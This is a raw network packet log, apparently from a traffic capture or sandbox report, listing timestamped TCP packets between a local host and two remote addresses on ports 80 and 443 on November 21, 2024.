                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.343358994 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.343409061 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.343451023 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.343496084 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.344388962 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.344444036 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.344482899 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.344528913 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.345475912 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.345523119 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.345577955 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.345621109 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.346576929 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.346643925 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.346882105 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.346936941 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.347764969 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.347822905 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.347907066 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.347958088 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.349229097 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.349287987 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.349466085 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.349519968 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.349932909 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.349983931 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.350009918 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.350058079 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.350939035 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.351003885 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.351030111 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.351079941 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.352005959 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.352065086 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.352097988 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.352149010 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.353117943 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.353205919 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.353271961 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.353332043 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.354187965 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.354247093 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.354326010 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.354384899 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.355381012 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.355441093 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.355489016 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.355551958 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.356352091 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.356405973 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.356431961 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.356483936 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.357465029 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.357518911 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.357562065 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.357611895 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.358577967 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.358634949 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.358684063 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.358727932 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.359635115 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.359689951 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.359755039 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.359807968 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.360749006 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.360804081 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.360825062 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.360874891 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.361974001 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.362010956 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.362032890 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.362065077 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.362963915 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.363024950 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.363074064 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.363130093 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.364016056 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.364082098 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.364116907 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.364166975 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.365200996 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.365258932 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.396927118 CET4434977113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.397567987 CET49771443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.397591114 CET4434977113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.398430109 CET49771443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.398436069 CET4434977113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.414779902 CET4434977213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.415256023 CET49772443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.415349007 CET4434977213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.415817976 CET49772443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.415833950 CET4434977213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.511626005 CET4434977313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.512171030 CET49773443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.512212992 CET4434977313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.512748957 CET49773443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.512756109 CET4434977313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.518404961 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.518503904 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.518508911 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.518553972 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.518985987 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.519046068 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.519185066 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.519233942 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.520035982 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.520071983 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.520111084 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.520124912 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.521138906 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.521198988 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.521240950 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.521289110 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.522217989 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.522277117 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.522330046 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.522382975 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.523616076 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.523693085 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.523725986 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.523781061 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.524403095 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.524466991 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.524519920 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.524573088 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.525563955 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.525619984 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.525633097 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.525676012 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.526722908 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.526787996 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.526884079 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.526935101 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.528001070 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.528053045 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.528084040 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.528134108 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.529150963 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.529237032 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.529283047 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.529339075 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.530473948 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.530543089 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.530558109 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.530611038 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.531325102 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.531384945 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.531385899 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.531438112 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.532140017 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.532203913 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.532206059 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.532260895 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.533103943 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.533159018 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.533207893 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.533268929 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.534183979 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.534235001 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.534259081 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.534308910 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.535274029 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.535346031 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.535382986 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.535434961 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.536470890 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.536524057 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.536746979 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.536801100 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.537462950 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.537514925 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.537554979 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.537611008 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.538546085 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.538645029 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.538676977 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.538721085 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.539628983 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.539750099 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.539752007 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.539803982 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.540729046 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.540793896 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.540872097 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.540935993 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.541861057 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.541928053 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.541971922 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.542025089 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.542901993 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.542958975 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.543016911 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.543067932 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.543989897 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.544047117 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.544096947 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.544147968 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.545130968 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.545187950 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.545223951 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.545275927 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.546175003 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.546230078 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.546269894 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.546320915 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.547265053 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.547324896 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.547364950 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.547414064 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.548363924 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.548419952 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.548485994 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.548538923 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.549504995 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.549556971 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.549571037 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.549621105 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.550533056 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.550586939 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.550616980 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.550678015 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.551606894 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.551660061 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.551727057 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.551780939 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.552722931 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.552789927 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.552845001 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.552896976 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.553816080 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.553870916 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.553966045 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.554019928 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.555043936 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.555099010 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.555239916 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.555294991 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.555995941 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.556051970 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.556090117 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.556138039 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.557118893 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.557176113 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.557185888 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.557234049 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.558182001 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.558244944 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.558337927 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.558399916 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.559250116 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.559282064 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.559314966 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.559325933 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.560360909 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.560419083 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.560544968 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.560596943 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.561487913 CET804977031.41.244.11192.168.2.4
